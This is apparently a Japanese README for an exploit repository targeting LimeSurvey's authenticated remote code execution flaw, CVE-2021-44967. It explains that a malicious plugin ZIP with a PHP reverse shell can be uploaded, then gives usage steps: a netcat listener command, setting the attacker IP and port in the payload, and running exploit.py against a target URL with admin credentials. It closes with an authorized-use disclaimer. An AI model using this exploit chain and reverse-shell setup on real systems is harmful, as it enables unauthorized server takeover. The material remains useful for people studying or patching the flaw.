
🔥 Limesurvey向け自動RCEエクスプロイト (CVE-2021-44967)。特権昇格のための最適化されたエクスプロイトチェーン。🚀
このリポジトリには、LimeSurvey の認証済みリモートコード実行脆弱性 CVE-2021-44967 の実用的なエクスプロイトが含まれています。
テスト済みで動作確認済み:
この脆弱性により、管理者権限を持つ認証済みユーザーが悪意のあるプラグインをアップロードできます。LimeSurvey はプラグインZIPの内容を厳密に検証せず、プラグインディレクトリ内のPHPファイルの実行を防止しないため、攻撃者はアップロードしたシェルに直接アクセスすることでRCEを達成できます。
config.xml を LimeSurvey バージョン3.0~6.0との互換性のために更新しました。マシンでnetcatリスナーを起動:
nc -lvnp 443
php-rev.php を編集して、ローカルIPとポートを設定:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
例:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: メインの自動化スクリプト。php-rev.php: PHPリバースシェルペイロード。config.xml: 必須のLimeSurveyプラグイン設定ファイル。このツールは教育目的および許可されたセキュリティテスト専用です。 厳密に管理された合法的な環境(例:CTF、ラボ環境、または許可されたエンゲージメント)での使用を意図しています。作者はこのツールの誤用や損害に対して一切責任を負いません。責任を持って、明確な許可を得たシステムでのみ使用してください。